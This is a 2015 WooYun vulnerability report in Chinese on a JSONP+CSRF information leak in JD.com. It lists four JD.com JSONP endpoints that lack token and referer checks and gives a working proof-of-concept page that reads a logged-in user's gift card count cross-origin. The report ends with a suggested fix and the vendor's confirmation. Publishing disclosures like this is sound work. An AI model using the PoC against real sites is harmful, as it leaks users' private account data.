当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0121266

漏洞标题:京东商城JSONP+CSRF导致某处信息泄露

相关厂商:京东商城

漏洞作者: Friday

提交时间:2015-06-17 22:00

修复时间:2015-08-03 13:02

公开时间:2015-08-03 13:02

漏洞类型:CSRF

危害等级:低

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-17: 细节已通知厂商并且等待厂商处理中
2015-06-19: 厂商已经确认,细节仅向厂商公开
2015-06-29: 细节向核心白帽子及相关领域专家公开
2015-07-09: 细节向普通白帽子公开
2015-07-19: 细节向实习白帽子公开
2015-08-03: 细节向公众公开

简要描述:

最近很火的JSONP+CSRF漏洞的利用

详细说明:

0.0今天小伙伴提到了JSONP漏洞,闲的无聊研究了一下。查资料的时候,看到了JD的广告,衣服的确挺合口味的,点进去,发现一枚漏洞,影响不算大,仅供娱乐~
这是我的订单页面存在漏洞的URL:
http://joycenter.jd.com/msgCenter/getUnreadNum.action?callback=jsonp1434548327779
http://baitiao.jd.com/ious/queryBT?callback=jsonp1434548327780
http://giftcard.jd.com/service/getGiftCardCount.action?callback=jsonp1434548327781
http://quan.jd.com/getcouponcount.action?callback=jsonp1434548327782
没有校验Token,也没有判断referer
写了个页面来利用其中的一个URL:

<meta charset="utf-8">
正在请求,请耐心等待... ...
<script type="text/javascript">
statu=0;
window.callback=function(e){
if(parseInt(e['GiftCardCount'])> 0){
alert('土豪哥哥,你有'+e['GiftCardCount']+'张优惠券~')
}
else{
alert('臭屌丝,一张优惠券都木有!')
}
statu=1;
}
setTimeout(function(){ if(statu==0){
alert('屌丝,你还木有登陆京东')
}},10000);
</script>
<script src="http://giftcard.jd.com/service/getGiftCardCount.action?callback=callback"></script>


漏洞证明:

参考样例: http://friday.sinaapp.com/jsonp.html
如果登录了京东商城,会返回优惠券的张数:

QQ图片20150617214410.png


否则十秒后,会返回错误:

QQ图片20150617214520.png


肯定还会有其他的漏洞,建议全线检查

修复方案:

验证referer、添加token
建议检查全线JSONP,对涉及到用户隐私的请求,一定添加用户验证

版权声明:转载请注明来源 Friday@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-06-19 13:00

厂商回复:

感谢您对京东的关注!

最新状态:

暂无


漏洞评价:

评论

  1. 2015-06-18 00:58 | qhwlpg ( 普通白帽子 | Rank:226 漏洞数:54 | 潜心代码审计。)

    15个关注也不留个评论,破0

  2. 2015-06-18 08:57 | 屎蛋 ( 路人 | Rank:8 漏洞数:2 | boom)

    马克

  3. 2015-07-09 14:01 | qhwlpg ( 普通白帽子 | Rank:226 漏洞数:54 | 潜心代码审计。)

    提乌云你亏了,提应急响应中心应该有100块钱

  4. 2015-08-03 13:10 | sOnsec ( 实习白帽子 | Rank:93 漏洞数:24 | 安全是什么...)

    亏了

  5. 2015-08-03 13:15 | BeenQuiver ( 普通白帽子 | Rank:101 漏洞数:26 | 专注而高效,坚持好的习惯千万不要放弃)

    jsonp在《前端xss》那本书就有了